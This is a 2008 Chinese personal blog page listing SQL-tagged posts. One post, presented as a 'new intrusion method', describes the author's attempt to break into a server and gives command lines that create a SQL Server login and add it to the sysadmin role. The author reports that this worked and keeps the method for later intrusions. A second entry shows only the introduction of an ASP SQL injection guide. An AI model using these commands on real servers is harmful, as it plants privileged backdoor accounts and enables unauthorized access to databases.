http://www.bycnboy.com/cnboy/soft_cnboy/x-scan.html

欢迎你,我的朋友,希望经常到我家哦,有什么话要对我是说 就请你留言哦 ……西西…^-^[欢迎光临] 提示:如果你觉得音乐太吵闹,请你选择下面静音版浏览博客。
中国知音在线 http://Online.bycnboy.com

您如果点击 它,你将看到我美好的图片, 记得给我加分哦…………嘿嘿 ^-^切换到: ∑静音版∮音乐版 您如果点击 它,你将看到我美好的图片, 记得给我加分哦…………嘿嘿 ^-^
中国知音QQ:274088126 Msn:CnBoy99@Hotmail.com E-mail:lide8008@163.com

Tag: SQL预览模式: 普通 | 列表

[技术文章] CMD下加sql账号--入侵新手法

作者:中国知音  日期:2008-06-18

[技术文章] CMD下加sql账号--入侵新手法

这个服务器可以用sql溢出,可惜就是找不到进一步的入侵方法,因而一直也没有拿下来。今天在校盟看到一篇文章,说是在cmd下也可以中入sql账号和密码,方法如下:

echo exec master.dbo.sp_addlogin 'rooto','******' >test.qry
echo exec sp_addsrvrolemember 'rooto','sysadmin' >>test.qry
cmd.exe /c isql -E /U alma /P /i c:\test.qry

看完后立马去试了一下,居然真的成功了,可是由于溢出,服务器的sql服务已经停止,只好等它下次启动时再运行了。不过对我来说,这种加sql账号的方法还是第一次,所以得拿出来记一下,以备以后还有能用得着的时候,呵呵。

查看更多...

Tags: 技术 入侵 提权 SQL CMD

分类:[技术讨论] | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 988

SQL注入天书

作者:中国知音  日期:2007-05-26

SQL注入天书之ASP注入漏洞全接触

关键词: SQL    注入   ASP                        
 引 言
   随着B/S模式应用开发的发展,使用这种模式编写应用程序的程序员也越来

越多。但是由于这个行业的入门门槛不高,程序员的水平及经验也参差不齐,相

当大一部分程序员在编写代码的时候,没有对用户输入数据的合法性进行判断,

使应用程序存在安全隐患。用户可以提交一段数据库查询代码,根据程序返回的

查看更多...

Tags: SQL {80}{54}

分类:[技术讨论] | 固定链接 | 禁止评论 | 引用: 0 | 查看次数: 1074